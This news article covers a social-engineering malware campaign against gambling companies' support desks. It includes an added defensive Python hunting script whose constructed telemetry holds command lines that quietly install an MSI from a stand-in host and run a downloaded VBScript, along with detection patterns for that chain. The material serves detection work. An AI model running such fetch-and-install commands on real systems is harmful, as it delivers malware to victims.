A cyber attack campaign has been targeting the gambling and gaming industries since at least September 2022 and was still underway in the run-up to the gaming industry trade fair ICE London 2023, set to open on February 7th.
The Israeli cybersecurity firm Security Joes, which has been tracking the campaign, attributes the intrusions to an activity cluster it calls Ice Breaker. The group relies on social engineering to get a JavaScript backdoor onto the support agent's workstation, and the intrusion proceeds from there.
According to Security Joes, every attack follows the same script: the threat actor poses as a customer, opens a chat with a gambling operator's customer service desk and claims to be having trouble registering an account. The attacker knows beforehand that the operator's support desk is staffed by people rather than bots. The "customer" then asks the agent to open a screenshot of the problem hosted on Dropbox; that link is the delivery vehicle for the JavaScript backdoor.
As soon as the agent clicks the purported screenshot link, either an LNK file or a VBScript file is retrieved. The LNK variant downloads and runs an MSI package that installs a Node.js implant; the VBScript variant acts as a downloader for a second payload.
Attackers Masked as Gambling Company Customers Get Access to Sensitive Internal Data
The JavaScript payload, Security Joes found, has the feature set of a typical backdoor: it lets the attacker enumerate running processes, exfiltrate arbitrary files, run VBScript fetched from a remote server, steal cookies and passwords, take screenshots, and open a reverse proxy on the compromised host.
When the victim runs the VBScript (VBS) downloader instead, the chain ends with the deployment of Houdini, a VBS-based remote access trojan that has been in circulation since 2013.
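As an added illustration, not part of the Security Joes report or of this article, the Python sketch below shows how a defender could hunt for the two delivery branches described above in process-creation telemetry: a script host handing off to msiexec with a package URL on its command line, node.exe launched under that installer, and wscript running a .vbs straight out of the Downloads folder. All events, paths and the staging host (files.example.invalid) are constructed, and the event field names are assumptions about the telemetry format.

```python
"""Hunting for the Ice Breaker-style infection chain in process-creation
telemetry.  Added illustration, not Security Joes' code.  Every event below is
constructed: Sysmon Event ID 1-like records with invented paths, an invented
staging host (files.example.invalid) and assumed field names."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Interpreters a malicious LNK or VBS lure typically lands in.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.I)
# A .vbs executed from a user-writable download/temp location.
VBS_FROM_DROP_RE = re.compile(r'\\(downloads|temp|appdata)\\[^"]*\.vbs\b', re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk the parent chain, nearest parent first; `seen` guards against PID reuse loops."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def hunt(events: List[ProcEvent]) -> List[dict]:
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = basename(ev.image)
        parents = [basename(a.image) for a in ancestors(ev, by_pid)]
        # Branch 1 (LNK lure): a script host hands off to msiexec, which fetches
        # the package straight from a URL rather than a local path.
        if (name == "msiexec.exe" and URL_RE.search(ev.cmdline)
                and parents and parents[0] in SCRIPT_HOSTS):
            findings.append({"rule": "msiexec-from-url-via-script-host",
                             "pid": ev.pid, "cmdline": ev.cmdline})
        # Branch 1, stage 2: node.exe started underneath an MSI install, i.e. the
        # Node.js implant being launched by the installer it arrived in.
        if name == "node.exe" and "msiexec.exe" in parents:
            findings.append({"rule": "node-under-msiexec",
                             "pid": ev.pid, "cmdline": ev.cmdline})
        # Branch 2 (VBS lure / Houdini): wscript or cscript executing a .vbs
        # that the agent just downloaded.
        if name in {"wscript.exe", "cscript.exe"} and VBS_FROM_DROP_RE.search(ev.cmdline):
            findings.append({"rule": "vbs-from-download-dir",
                             "pid": ev.pid, "cmdline": ev.cmdline})
    return findings


# Constructed telemetry: one support-agent session containing both lure
# branches, plus two benign processes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    # LNK double-clicked from the Dropbox download -> cmd -> msiexec from URL -> node
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /i https://files.example.invalid/screenshot.msi /qn"),
    ProcEvent(400, 300, r"C:\Windows\System32\msiexec.exe",
              "msiexec /i https://files.example.invalid/screenshot.msi /qn"),
    ProcEvent(500, 400, r"C:\ProgramData\updater\node.exe",
              r"node.exe C:\ProgramData\updater\main.js"),
    # VBS branch: the "screenshot" is really a .vbs sitting in Downloads
    ProcEvent(600, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\agent\Downloads\screenshot.vbs"'),
    # Benign: Windows Installer servicing a local package, and a developer's node server
    ProcEvent(700, 1, r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Windows\Installer\1a2b3c.msi /qn"),
    ProcEvent(800, 100, r"C:\Program Files\nodejs\node.exe", "node.exe server.js"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} {f['cmdline']}")
```

The msiexec rule deliberately requires both a URL in the command line and a script-host parent, so routine Windows Installer activity from a local package path stays quiet; the node.exe rule keys on lineage rather than on the binary's location, which is what survives the attacker renaming or relocating the implant. In a real deployment the events would come from Sysmon Event ID 1 or equivalent EDR telemetry rather than the constructed list above.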
The origin of the attackers is still unknown. Security Joes notes in its report that the operators posing as customers wrote in broken English when chatting with the support agents. Indicators of compromise tied to the same campaign, which has hit gambling companies worldwide, were shared by MalwareHunterTeam back in October 2022.
Felipe Duarte, senior threat researcher at Security Joes, explained that this was a highly effective attack vector for the global gambling and gaming industry. According to Mr. Duarte, the attackers had managed to compile JavaScript second-stage malware, which is extremely difficult to dissect, which shows that whoever is behind the attacks has skills and experience in the area and could even be sponsored by another interested person or organization.